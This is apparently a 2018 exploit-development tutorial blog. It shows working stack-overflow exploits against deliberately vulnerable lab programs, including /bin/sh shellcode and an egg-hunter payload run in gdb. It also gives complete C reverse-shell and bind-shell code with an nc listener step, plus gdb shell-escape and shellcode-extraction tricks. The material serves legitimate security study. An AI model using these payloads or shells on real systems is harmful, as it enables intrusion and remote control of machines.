Sunday, 22 April 2018

Why do we need Egg Hunters?

In this post I am going to show you a few examples of buffer overflows and why we need egg hunters in certain scenarios.

For these examples I am going to turn off the usual mitigations and compile the code with a few unsafe flags:
  • Disable ASLR system-wide: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
  • Allow stack smashing: compile the program with -fno-stack-protector
  • Make the stack executable: compile the program with -z execstack
The examples are 32-bit x86 (note the 0xbfff.... stack addresses and the EIP register), so on a 64-bit host also pass -m32 to gcc.

Let's get started with some simple vulnerable code.

Scenario 1

#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: strcpy copies argv[1] into a 500-byte stack
 * buffer with no length check, so a longer argument overwrites the saved
 * return address. */
int main(int argc, char **argv)
{
        char buffer[500];
        if (argc < 2)
                return 1;
        strcpy(buffer, argv[1]);
        printf("%s", buffer);
        return 0;
}

dibyendu@ubuntu:~/Desktop/b0f$ gdb -q ./b0f.o
Reading symbols from /home/dibyendu/Desktop/b0f/b0f.o...(no debugging symbols found)...done.
(gdb) r $(python -c 'print "A"*100+"B"*200+"C"*300+"D"*400+"E"*500')
Starting program: /home/dibyendu/Desktop/b0f/b0f.o $(python -c 'print "A"*100+"B"*200+"C"*300+"D"*400+"E"*500')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEE
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) 

Looking at the memory contents of the stack after the crash, we can see that we control a large contiguous region, which leaves plenty of room for shellcode:

0xbfffeb7c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffeb8c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffeb9c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffebac: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffebbc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffebcc: 0x41414141 0x42424242 0x42424242 0x42424242
0xbfffebdc: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffebec: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffebfc: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec0c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec1c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec2c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec3c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec4c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec5c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec6c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec7c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec8c: 0x42424242 0x42424242 0x42424242 0x43434343
0xbfffec9c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffecac: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffecbc: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffeccc: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffecdc: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffecec: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffecfc: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed0c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed1c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed2c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed3c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed4c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed5c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed6c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed7c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed8c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed9c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffedac: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffedbc: 0x43434343 0x43434343 0x44444444 0x44444444
0xbfffedcc: 0x44444444 0x44444444 0x44444444 0x44444444
0xbfffeddc: 0x44444444 0x44444444 0x44444444 0x44444444

Since ASLR is disabled, the address space is not randomised between runs, so we can pick a location on the stack, place the shellcode there and overwrite EIP with that address. Let us get the EIP offset first by narrowing the pattern until the crash lands on the 4 "D" bytes.

(gdb) r $(python -c 'print "A"*100+"B"*200+"C"*212+"D"*4+"E"*500')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dibyendu/Desktop/b0f/b0f.o $(python -c 'print "A"*100+"B"*200+"C"*212+"D"*4+"E"*500')

Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()

So:
EIP offset = 100 + 200 + 212 = 512
Address in the stack where the shellcode will sit = 0xbfffef38 (found with the debugger)

execve("/bin/sh") shellcode, 23 bytes:
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"

The payload below is 16 NOPs, the shellcode, NOPs up to offset 512, the return address written little-endian, and 16 bytes of padding.

Final Exploit and the result

(gdb) r $(python -c 'print "\x90"*16+"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"+"\x90"*(512-23-16)+"\x38\xef\xff\xbf"+"D"*16')
Starting program: /home/dibyendu/Desktop/b0f/b0f.o $(python -c 'print "\x90"*16+"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"+"\x90"*(512-23-16)+"\x38\xef\xff\xbf"+"D"*16')
process 3549 is executing new program: /bin/dash
$ whoami
dibyendu

Scenario 2

That was straightforward. Now take the following code. The buffer has been reduced to 100 bytes, and the copy uses strncpy rather than strcpy. Note that the bound passed to strncpy (200) is larger than the buffer, so the overflow is not prevented, only capped at 200 bytes.



#include <stdio.h>
#include <string.h>

/* Still vulnerable: the strncpy bound (200) exceeds the 100-byte buffer,
 * so up to 100 bytes past the buffer can be overwritten, no more. */
int main(int argc, char **argv)
{
        char buffer[100];
        if (argc < 2)
                return 1;
        strncpy(buffer, argv[1], 200);
        printf("%s", buffer);
        return 0;
}

We run the same initial pattern from the first example and check the stack again.

(gdb)  r $(python -c 'print "A"*100+"B"*200+"C"*300+"D"*400+"E"*500')
Starting program: /home/dibyendu/Desktop/b0f/bof_limited_buffer.o $(python -c 'print "A"*100+"B"*200+"C"*300+"D"*400+"E"*500')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

The stack contents show that we can only overwrite a limited region: the 100-byte buffer plus 100 bytes beyond it, because strncpy stops after 200 bytes.

(gdb) x/100x $esp-200
0xbfffec88: 0xb7e61741 0xb7fc6ff4 0x00000000 0x00000000
0xbfffec98: 0xbfffed48 0xb7e6b8cf 0xb7fc7a20 0x08048530
0xbfffeca8: 0xbfffecc4 0xb7e6b8a0 0x08048530 0xb7fff918
0xbfffecb8: 0xb7fc6ff4 0x08048452 0x08048530 0xbfffecdc
0xbfffecc8: 0x000000c8 0xb7ff3f9c 0xbfffed84 0x00000000
0xbfffecd8: 0x00000000 0x41414141 0x41414141 0x41414141
0xbfffece8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffecf8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffed08: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffed18: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffed28: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffed38: 0x41414141 0x41414141 0x42424242 0x42424242
0xbfffed48: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffed58: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffed68: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffed78: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffed88: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffed98: 0x42424242 0x42424242 0x42424242 0xb7ff2660
0xbfffeda8: 0xb7e38449 0xb7ffeff4 0x00000002 0x08048360
0xbfffedb8: 0x00000000 0x08048381 0x08048414 0x00000002
0xbfffedc8: 0xbfffede4 0x08048460 0x080484d0 0xb7fed230
0xbfffedd8: 0xbfffeddc 0xb7fff918 0x00000002 0xbfffef53
0xbfffede8: 0xbfffef83 0x00000000 0xbffff560 0xbffff573
0xbfffedf8: 0xbffff59e 0xbffff5ae 0xbffff5b9 0xbffff60a

What is an egg hunter?

As shown above, the overflow in this application is limited: strncpy copies at most 200 bytes, so we can only overwrite a small section of the stack frame. The full argument string, however, still resides in memory, in the area near the top of the stack where the kernel placed argv when the program started:

(gdb) x/150x $esp+600
0xbfffefa8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffefb8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffefc8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffefd8: 0x41414141 0x41414141 0x41414141 0x42414141
0xbfffefe8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffeff8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff008: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff018: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff028: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff038: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff048: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff058: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff068: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff078: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff088: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff098: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff0a8: 0x42424242 0x43424242 0x43434343 0x43434343
0xbffff0b8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff0c8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff0d8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff0e8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff0f8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff108: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff118: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff128: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff138: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff148: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff158: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff168: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff178: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff188: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff198: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff1a8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff1b8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff1c8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff1d8: 0x44434343 0x44444444 0x44444444 0x44444444
0xbffff1e8: 0x44444444 0x44444444 0x44444444 0x44444444
0xbffff1f8: 0x44444444 0x44444444

The idea of an egg hunter is to prefix the real shellcode with a unique marker, the "tag" (or egg), and to place a small search stub in the limited space we do control. The stub, which is much smaller than the final shellcode, walks through the process's memory looking for the tag and, once it finds it, jumps to that location, so execution falls through into the shellcode that follows the tag. The tag is written twice in a row so that the search does not match the single copy of the tag embedded in the hunter's own code.

Implementing an egg hunter (with reference to skape's paper)




In this case the EIP offset is 112:
(gdb) r $(python -c 'print "A"*112+"B"*2+"C"*2+"D"*400+"E"*500')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dibyendu/Desktop/b0f/bof_limited_buffer.o $(python -c 'print "A"*112+"B"*2+"C"*2+"D"*400+"E"*500')

Program received signal SIGSEGV, Segmentation fault.
0x43434242 in ?? ()

So our exploit payload will look like this:

[NOPS] [EGG HUNTER PAYLOAD] [NOPS] [RETURN ADDRESS] [TAG][TAG] [SHELLCODE]

[NOPS] = "\x90"*24
[EGG HUNTER PAYLOAD] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x42\x41\x42\x41\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2" (43 bytes; skape's access(2) egg hunter, tag "BABA" = 0x41424142)
[NOPS] = "\x90"*(112-43-24) (45 bytes, so that the return address lands exactly at offset 112)
[RETURN ADDRESS] = 0xbffff268, written little-endian as "\x68\xf2\xff\xbf"
[TAG][TAG] = "\x42\x41\x42\x41\x42\x41\x42\x41"
[SHELLCODE] = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"
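The following is an added example, written for this page and not code from the original post. It builds the Scenario 1 and Scenario 2 payloads in C from the page's own values (EIP offsets 512 and 112, the two return addresses, the 43-byte hunter and the 23-byte shellcode) and models the hunter's search loop in C, so the tag lookup and the layout arithmetic can be checked without running the hunter. The output buffer sizes are assumed; the access(2) page probe of the real hunter is only described in a comment, since a plain buffer has no unmapped pages.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* "BABA" read as a little-endian dword: the value the hunter loads into ebx. */
#define EGG 0x41424142u
#define TAG_LEN 4

/* skape's access(2) egg hunter, 43 bytes, exactly as quoted in the post. */
static const unsigned char EGGHUNTER[] = {
    0x31, 0xc0, 0x31, 0xdb, 0x31, 0xc9, 0x31, 0xd2, /* xor eax/ebx/ecx/edx */
    0xbb, 0x42, 0x41, 0x42, 0x41,                   /* mov ebx, 0x41424142 ("BABA") */
    0x66, 0x81, 0xca, 0xff, 0x0f,                   /* or dx, 0x0fff: last byte of this page */
    0x42,                                           /* inc edx: first byte of the next page */
    0x60,                                           /* pushad */
    0x8d, 0x5a, 0x04,                               /* lea ebx, [edx+4] */
    0xb0, 0x21,                                     /* mov al, 0x21 (sys_access) */
    0xcd, 0x80,                                     /* int 0x80 */
    0x3c, 0xf2,                                     /* cmp al, 0xf2 (-EFAULT: page not mapped) */
    0x61,                                           /* popad */
    0x74, 0xed,                                     /* jz: skip to the next page */
    0x39, 0x1a,                                     /* cmp [edx], ebx */
    0x75, 0xee,                                     /* jnz: inc edx and retry */
    0x39, 0x5a, 0x04,                               /* cmp [edx+4], ebx */
    0x75, 0xe9,                                     /* jnz: inc edx and retry */
    0xff, 0xe2                                      /* jmp edx: land on the first tag */
};

/* execve("/bin//sh") shellcode, 23 bytes, as used in both scenarios. */
static const unsigned char SHELLCODE[] = {
    0x6a, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f,
    0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80
};

static const unsigned char TAG[TAG_LEN] = { 0x42, 0x41, 0x42, 0x41 };   /* "BABA" */

/* Lays out [NOPs][stage][NOPs][ret][tail] so that ret lands exactly at
 * eip_offset. Scenario 1: stage = shellcode, tail = padding. Scenario 2:
 * stage = egg hunter, tail = tag, tag, shellcode. Returns the payload
 * length, or 0 if the stage does not fit in front of the return address or
 * the output buffer (cap bytes, an assumed size) is too small. */
size_t build_payload(unsigned char *out, size_t cap,
                     size_t eip_offset, size_t lead_nops,
                     const unsigned char *stage, size_t stage_len,
                     uint32_t ret_addr,
                     const unsigned char *tail, size_t tail_len)
{
    if (lead_nops + stage_len > eip_offset || eip_offset + 4 + tail_len > cap)
        return 0;
    memset(out, 0x90, eip_offset);                 /* NOP sled on both sides of the stage */
    memcpy(out + lead_nops, stage, stage_len);
    size_t pos = eip_offset;
    for (int i = 0; i < 4; i++)                    /* little-endian, e.g. "\x68\xf2\xff\xbf" */
        out[pos++] = (unsigned char)(ret_addr >> (8 * i));
    memcpy(out + pos, tail, tail_len);
    return pos + tail_len;
}

/* Tail for Scenario 2: the tag twice, then the shellcode. Returns its length. */
size_t make_egg_tail(unsigned char *out, size_t cap)
{
    size_t len = 2 * TAG_LEN + sizeof SHELLCODE;
    if (cap < len)
        return 0;
    memcpy(out, TAG, TAG_LEN);
    memcpy(out + TAG_LEN, TAG, TAG_LEN);
    memcpy(out + 2 * TAG_LEN, SHELLCODE, sizeof SHELLCODE);
    return len;
}

/* C model of the hunter's search loop: advance one byte at a time and stop
 * at the first place where two consecutive dwords both equal EGG. Returns
 * the offset of the first tag (where "jmp edx" lands; the 8 tag bytes decode
 * as inc edx / inc ecx and fall through into the shellcode), or -1. The real
 * hunter also probes each page with access(2) to skip unmapped memory. */
long hunt_egg(const unsigned char *mem, size_t len)
{
    for (size_t i = 0; i + 2 * TAG_LEN <= len; i++) {
        uint32_t first, second;
        memcpy(&first, mem + i, TAG_LEN);           /* memcpy: no unaligned dword reads */
        memcpy(&second, mem + i + TAG_LEN, TAG_LEN);
        if (first == EGG && second == EGG)           /* little-endian host, as on x86 */
            return (long)i;
    }
    return -1;
}

int main(void)
{
    unsigned char payload[256], tail[64];
    size_t tail_len = make_egg_tail(tail, sizeof tail);
    size_t n = build_payload(payload, sizeof payload, 112, 24,
                             EGGHUNTER, sizeof EGGHUNTER, 0xbffff268u, tail, tail_len);
    long egg = hunt_egg(payload, n);
    printf("payload: %zu bytes, egg at offset %ld, shellcode at offset %ld\n",
           n, egg, egg + 2 * TAG_LEN);
    return 0;
}
```

hunt_egg run over the Scenario 2 payload skips the lone "BABA" inside the hunter's mov ebx instruction and stops at the doubled tag right after the return address, which is why the egg has to be the tag twice.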

Testing our proof of concept

(gdb) r $(python -c 'print "\x90"*24+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x42\x41\x42\x41\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2"+"\x90"*(112-43-24)+"\x68\xf2\xff\xbf"+"\x42\x41\x42\x41\x42\x41\x42\x41"+"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')
Starting program: /home/dibyendu/Desktop/b0f/bof_limited_buffer.o $(python -c 'print "\x90"*24+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x42\x41\x42\x41\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2"+"\x90"*(112-43-24)+"\x68\xf2\xff\xbf"+"\x42\x41\x42\x41\x42\x41\x42\x41"+"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')
process 3762 is executing new program: /bin/dash
$ whoami
dibyendu

Credits and References  : 

Florian Bogner ( https://www.linkedin.com/in/fbogner/)   [ for giving me some tips of the vulnerable code implementation ]

www.hick.org/code/skape/papers/win32-shellcode.pdf            [ for the egghunter explanation ]

https://osandamalith.com/2015/02/12/x86-linux-egg-hunter/   [ for the c wrapper of the egghunter shellcode ]

Saturday, 14 April 2018

Coding a custom TCP Reverse Shell Shellcode for Linux x86 with Assembly

A shell is a program that takes commands from the user, passes them to the operating system and returns the output. In this writeup I will show how to create a custom TCP reverse shell shellcode. So how does a TCP reverse shell work?

A reverse shell is more effective than a bind shell when the victim's firewall blocks incoming connections. Instead of opening a port on the victim, we open a listening port on the attacker's machine, and the shellcode makes the victim connect back to us. When that connection arrives at our listener, the victim side attaches a shell to the socket and hands control to the attacker, who can then run any commands on the victim's machine.

A few points to make clear before going through the code:
1. The code went through a lot of debugging and modification and I am still modifying it, to shrink it and to remove bad characters. For example, push 0x0 assembles with NULL bytes, so I replaced such pushes with a register that already holds the value NULL, e.g. push ecx.

2. Some of the code might look STUPID (for example mov eax, edx followed by mov edx, eax). I wrote those to keep track of which register holds what before an operation, and I am still optimising them away. As I keep updating the code I will continue to remove them.

3. I will try to keep the documentation and the details in the code itself, so that I can modify it in one place (GitHub) instead of twice, here and on GitHub.

Part 1: Writing a TCP Reverse Shell in C. Why start with C code?

Firstly, the C version uses the same function calls that we will re-implement one for one in the assembly version.
Secondly, the documentation is readily available on Linux: every call can be looked up with the man command, e.g. man socket.



TCP Reverse Shell written in NASM. This version has a drawback: it only connects back to the hardcoded address 127.0.0.1, which is fixed in the next version below.

The code was changed so that it can connect to any IP address and port:

Shellcode with configurable IP and port


This blog post has been created for completing the requirements of SecurityTube Linux Assembly Expert Certification:
http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-1191

Monday, 9 April 2018

Coding a custom TCP Bind Shell Shellcode for Linux x86 with Assembly

A shell is a program that takes commands from the user, passes them to the operating system and returns the output. In this writeup I will show how to create a custom TCP bind shell shellcode.

So how does a TCP bind shell work?
In a TCP bind shell, the shellcode opens a listening port on the victim. When the attacker connects to that port, the shellcode attaches a shell to the connection and hands control to the attacker, who can then run any commands on the victim's machine.

A few points to make clear before going through the code:
1. The code went through a lot of debugging and modification and I am still modifying it, to shrink it and to remove bad characters. For example, push 0x0 assembles with NULL bytes, so I replaced such pushes with a register that already holds the value NULL, e.g. push ecx.

2. Some of the code might look STUPID (for example mov eax, edx followed by mov edx, eax). I wrote those to keep track of which register holds what before an operation, and I am still optimising them away. As I keep updating the code I will continue to remove them.

3. I will try to keep the documentation and the details in the code itself, so that I can modify it in one place (GitHub) instead of twice, here and on GitHub.

Part 1: Writing a TCP Bind Shell in C. Why start with C code?

Firstly, the C version uses the same function calls that we will re-implement one for one in the assembly version.
Secondly, the documentation is readily available on Linux: every call can be looked up with the man command, e.g. man socket.



Part 2: Replicating the same TCP Bind Shell in NASM



Part 3: The Generated Opcodes



Part 4: Testing our shellcode. The code is written so that the port number can be reconfigured to any port instead of the default 9000.
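As an added example for both the reverse shell post above and this bind shell post (not the posts' own C or NASM code, whose listings are not reproduced on this page), here are the two shells written in C with the socket calls that the assembly versions re-implement. make_addr builds the sockaddr_in that the shellcode has to push on the stack, and addr_null_bytes counts the NUL bytes in its port and address fields, which is the bad-character problem point 1 of both posts describes: 127.0.0.1 carries two NUL bytes and INADDR_ANY four, so those values cannot be pushed as plain immediates. The address 192.168.56.101 and the ports are assumed values; serve_shell is the part common to both shells.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Builds the sockaddr_in the shellcode pushes on the stack: AF_INET, port
 * and address both in network byte order. ip == NULL means INADDR_ANY, the
 * wildcard the bind shell listens on. Returns 0, or -1 for a bad address. */
int make_addr(struct sockaddr_in *sa, const char *ip, uint16_t port)
{
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    sa->sin_port = htons(port);
    if (ip == NULL) {
        sa->sin_addr.s_addr = htonl(INADDR_ANY);
        return 0;
    }
    return inet_pton(AF_INET, ip, &sa->sin_addr) == 1 ? 0 : -1;
}

/* Counts NUL bytes among the six bytes of port and address that the
 * shellcode must carry as immediates. A NUL there ends a strcpy-style copy
 * early, which is why the assembly avoids "push 0" and why 127.0.0.1 or
 * port 80 are awkward choices for a hardcoded target. */
size_t addr_null_bytes(const struct sockaddr_in *sa)
{
    unsigned char raw[6];
    memcpy(raw, &sa->sin_port, 2);
    memcpy(raw + 2, &sa->sin_addr, 4);
    size_t count = 0;
    for (size_t i = 0; i < sizeof raw; i++)
        if (raw[i] == 0)
            count++;
    return count;
}

/* Shared tail of both shells: stdin, stdout and stderr become the socket,
 * then /bin/sh replaces this process. Only returns if execve fails. */
static void serve_shell(int fd)
{
    char *const argv[] = { "/bin/sh", NULL };
    for (int i = 0; i < 3; i++)
        dup2(fd, i);
    execve("/bin/sh", argv, NULL);
}

/* Reverse shell: connect out to the attacker's listener, then serve a shell. */
int reverse_shell(const char *ip, uint16_t port)
{
    struct sockaddr_in sa;
    if (make_addr(&sa, ip, port) < 0)
        return -1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        close(fd);
        return -1;
    }
    serve_shell(fd);
    return -1;
}

/* Bind shell: listen on the port, accept one client, then serve a shell. */
int bind_shell(uint16_t port)
{
    struct sockaddr_in sa;
    make_addr(&sa, NULL, port);
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 1) < 0) {
        close(fd);
        return -1;
    }
    int client = accept(fd, NULL, NULL);
    if (client < 0) {
        close(fd);
        return -1;
    }
    serve_shell(client);
    return -1;
}

int main(int argc, char **argv)
{
    /* ./shell reverse 192.168.56.101 9000   or   ./shell bind 9000 */
    if (argc == 4 && strcmp(argv[1], "reverse") == 0)
        return reverse_shell(argv[2], (uint16_t)atoi(argv[3]));
    if (argc == 3 && strcmp(argv[1], "bind") == 0)
        return bind_shell((uint16_t)atoi(argv[2]));
    fprintf(stderr, "usage: %s reverse <ip> <port> | bind <port>\n", argv[0]);
    return 2;
}
```

To try the reverse shell, start a listener on the attacker side first (for example nc -lvp 9000), then run the binary with the reverse argument; for the bind shell run the binary first and connect to it with nc.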

This blog post has been created for completing the requirements of SecurityTube Linux Assembly Expert Certification:
http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-1191

Monday, 19 February 2018

Privilege Escalation Tricks : Shell Escape and Executing Shell Commands Via GDB

Often during a pentest or a CTF you need to execute shell commands but cannot because of limited privileges, or you need to escape a restricted shell. In such scenarios certain techniques come in handy, like:

  • Using NMAP  
  • Using Vi Editor
  • Using Find Command

Yesterday, while I was playing with GDB, I found a way to achieve similar results.

Here you can see that I can invoke system commands from the gdb prompt.



Furthermore, you can get a proper shell as well.



Thanks for reading ! 

Sunday, 18 February 2018

ASM to ShellCode and Shellcode to ASM

As I have started a journey into vulnerability research and exploitation, I thought of sharing some topics which I found very confusing initially. I will try to give as much detail as possible.

We will begin by writing a simple hello world assembly program. The code will do the following:

  • Print HelloWorld
  • and Exit
Now you may wonder why the program has to exit explicitly. If so, you have probably written a good amount of code in a high-level language, where the compiler emits that extra code for you. Every operation such as read, write or exit ultimately requires a call into the kernel; these calls are system calls (syscalls). When programming in C or C++ you never write the syscalls yourself, because the standard library and the compiler-generated startup and exit code hide them behind an abstraction layer. In assembly nothing is hidden: if the program does not invoke the exit syscall, execution simply runs off the end of the code into whatever bytes follow. On 32-bit Linux a syscall is triggered with a software interrupt (int 0x80), which the processor dispatches through the interrupt descriptor table to the kernel's syscall handler; the syscall number goes in eax and the arguments in ebx, ecx and edx. The diagram below shows the workflow of a syscall through the interrupt.



Now that I have given a brief idea of why an exit is needed in asm, here is the hello world program:



Now that I have a working ELF binary, the next target is to generate the shellcode from it.

I will use the objdump utility to view the disassembled contents of the binary along with the opcodes.


There is a nice one-liner at ( http://www.commandlinefu.com/commands/view/6051/get-all-shellcode-on-binary-file-from-objdump ) which we can use to extract the opcodes from the binary as a "\xNN" string:

objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

